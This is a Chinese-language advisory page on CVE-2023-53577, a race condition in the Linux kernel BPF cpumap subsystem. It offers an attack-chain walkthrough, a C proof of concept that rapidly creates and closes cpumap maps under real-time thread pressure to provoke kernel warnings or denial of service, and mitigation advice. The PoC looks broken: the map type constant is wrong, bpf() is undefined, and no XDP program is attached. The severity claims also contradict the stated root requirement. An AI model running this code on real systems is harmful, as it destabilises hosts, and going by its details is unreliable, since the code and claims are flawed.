CVE-2023-53577：Linux内核BPF cpumap竞争条件漏洞

漏洞信息

漏洞编号

CVE-2023-53577

漏洞类型

竞争条件漏洞（Race Condition）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（BPF cpumap子系统）

漏洞概述

CVE-2023-53577是Linux内核BPF（Berkeley Packet Filter）cpumap子系统中存在的一个高危竞争条件漏洞。该漏洞源于cpu_map_update_elem操作中，per-cpu kthread的启动与停止之间存在时序竞争问题。当使用stress模式运行xdp_redirect_cpu并配合RT线程时，内核会触发WARNING警告。具体表现为：kthread_stop()在cpu_map_kthread_stop()中过早停止了kthread线程，而kthread()函数尚未调用cpu_map_kthread_run()，但XDP程序已经将部分frames或skbs排入ptr_ring队列中。当__cpu_map_ring_cleanup()检查ptr_ring时，发现队列未被清空，从而触发警告并可能导致内存泄漏或资源管理异常。该漏洞与commit 436901649731修复的内存泄漏问题根因相同。CVSS评分为7.8，属于高危级别，攻击者需要本地低权限访问即可利用，对系统的机密性、完整性和可用性均产生高影响。

技术细节

该漏洞的技术原理涉及Linux内核BPF cpumap的kthread生命周期管理。cpumap是BPF/XDP（eXpress Data Path）框架中的一个关键组件，用于在不同CPU核心之间重定向数据包。

漏洞根本原因：在__cpu_map_entry_alloc()函数返回之前，系统未能确保per-cpu kthread已经成功启动并运行。当kthread_stop()被调用时，如果kthread尚未执行cpu_map_kthread_run()，则ptr_ring中已排队的frames或skbs将无法被正常处理。__cpu_map_ring_cleanup()检测到ptr_ring非空时，会触发内核WARNING警告（kernel/bpf/cpumap.c:135），并可能引发put_cpu_map_entry中的引用计数异常。

调用链分析：触发路径为cpu_map_kthread_stop() -> put_cpu_map_entry()，通过process_one_work -> worker_thread -> kthread的工作队列机制执行。

利用方式：攻击者需要本地低权限访问系统，通过创建并操作BPF cpumap映射，触发xdp_redirect_cpu操作。在stress模式下，结合RT线程的调度干扰，可以放大竞争窗口，强制触发kthread过早停止的场景。成功后可能导致内核警告、系统不稳定或拒绝服务。

修复方案：在__cpu_map_entry_alloc()返回前确保per-cpu kthread已正常运行，消除kthread_stop()的错误处理路径（因为修复后kthread_stop()始终返回0）。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获取目标Linux系统的本地访问权限，需要具备root权限或CAP_BPF/CAP_NET_ADMIN capability才能操作BPF子系统。

STEP 2

步骤2：创建BPF cpumap映射

通过bpf()系统调用创建BPF_MAP_TYPE_CPUMAP类型的映射，并使用BPF_MAP_UPDATE_ELEM更新映射元素，将特定CPU核心绑定到cpumap条目。

STEP 3

步骤3：触发竞争窗口

在高压力环境下（如stress模式运行xdp_redirect_cpu配合RT实时线程），快速创建和销毁cpumap条目，迫使kthread_stop()在kthread尚未执行cpu_map_kthread_run()时被调用。

STEP 4

步骤4：触发内核警告

当__cpu_map_ring_cleanup()检查ptr_ring时发现队列非空（因为XDP程序已排入frames但kthread未运行处理），触发内核WARNING警告，可能导致系统不稳定或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2023-53577 - Linux Kernel BPF cpumap Race Condition
// This PoC demonstrates triggering the race condition in cpu_map_kthread_stop
// Requires: root or CAP_BPF/CAP_NET_ADMIN privileges, Linux kernel < 6.5

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <sys/resource.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>

// Structure to hold CPU map FD
static int g_cpumap_fd = -1;

// Thread function to create RT scheduling pressure
static void *rt_pressure_thread(void *arg) {
    struct sched_param sp = { .sched_priority = 50 };
    pthread_setschedparam(pthread_self(), SCHED_FIFO, &sp);
    volatile long long counter = 0;
    while (1) {
        counter++;  // Busy loop to create CPU pressure
        if (counter % 1000000 == 0) {
            usleep(1);  // Yield occasionally
        }
    }
    return NULL;
}

// Create a BPF CPU map with specified CPU
static int create_cpumap(int cpu) {
    int fd;
    __u32 key = 0;
    __u32 value = cpu;

    // BPF_MAP_TYPE_CPUMAP creation
    union bpf_attr attr = {};
    attr.map_type = 6;  // BPF_MAP_TYPE_CPUMAP
    attr.key_size = 4;
    attr.value_size = 4;
    attr.max_entries = 1;

    fd = bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
    if (fd < 0) {
        perror("bpf_map_create");
        return -1;
    }

    // Update the map with target CPU
    attr.map_fd = fd;
    attr.key = (__u64)&key;
    attr.value = (__u64)&value;
    if (bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)) < 0) {
        perror("bpf_map_update_elem");
        close(fd);
        return -1;
    }

    return fd;
}

// Rapidly create and destroy CPU maps to trigger race condition
static void *trigger_race(void *arg) {
    int iterations = *(int *)arg;
    for (int i = 0; i < iterations; i++) {
        int fd = create_cpumap(i % 8);
        if (fd >= 0) {
            // Immediately close to trigger kthread_stop
            // while kthread may not have started yet
            close(fd);
        }
        // No sleep - maximize race window
    }
    return NULL;
}

int main(int argc, char **argv) {
    int num_threads = 4;
    int iterations = 10000;

    printf("CVE-2023-53577 PoC - BPF cpumap Race Condition\n");
    printf("Requires: Linux kernel < 6.5, root/CAP_BPF\n\n");

    if (getuid() != 0) {
        fprintf(stderr, "Error: must run as root\n");
        return 1;
    }

    // Set RT scheduling for main process
    struct sched_param sp = { .sched_priority = 1 };
    setpriority(PRIO_PROCESS, 0, -20);

    // Launch RT pressure threads
    pthread_t rt_threads[4];
    for (int i = 0; i < 4; i++) {
        pthread_create(&rt_threads[i], NULL, rt_pressure_thread, NULL);
    }

    // Launch race trigger threads
    pthread_t race_threads[4];
    for (int i = 0; i < num_threads; i++) {
        pthread_create(&race_threads[i], NULL, trigger_race, &iterations);
    }

    // Wait for completion
    for (int i = 0; i < num_threads; i++) {
        pthread_join(race_threads[i], NULL);
    }

    printf("Race condition trigger complete. Check dmesg for warnings.\n");
    printf("Look for: WARNING: CPU: ... at kernel/bpf/cpumap.c:135\n");

    return 0;
}

// Build: gcc -o poc poc.c -lbpf -lpthread
// Run: sudo ./poc
// Expected: Kernel warning at kernel/bpf/cpumap.c:135 (put_cpu_map_entry+0xda/0x220)

影响范围

Linux Kernel < 6.5.0-rc2+

Linux Kernel stable分支（修复commit: 640a604585aa30f93e39b17d4d6ba69fcb1e66c9）

Linux Kernel stable分支（修复commit: 7a1178a3671b40746830d355836b72e47ceb2490）

Linux Kernel stable分支（修复commit: b44d28b98f185d2f2348aa3c3636838c316f889e）

Linux Kernel stable分支（修复commit: ecb45b852af5e88257020b88bea5ff0798d72aca）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1) 通过设置sysctl参数kernel.unprivileged_bpf_disabled=1禁用非特权BPF；2) 使用seccomp或LSM限制bpf()系统调用的使用；3) 避免在生产环境中运行xdp_redirect_cpu的stress模式测试；4) 监控dmesg日志，及时发现cpumap相关的内核警告；5) 限制本地用户的CAP_BPF和CAP_NET_ADMIN权限。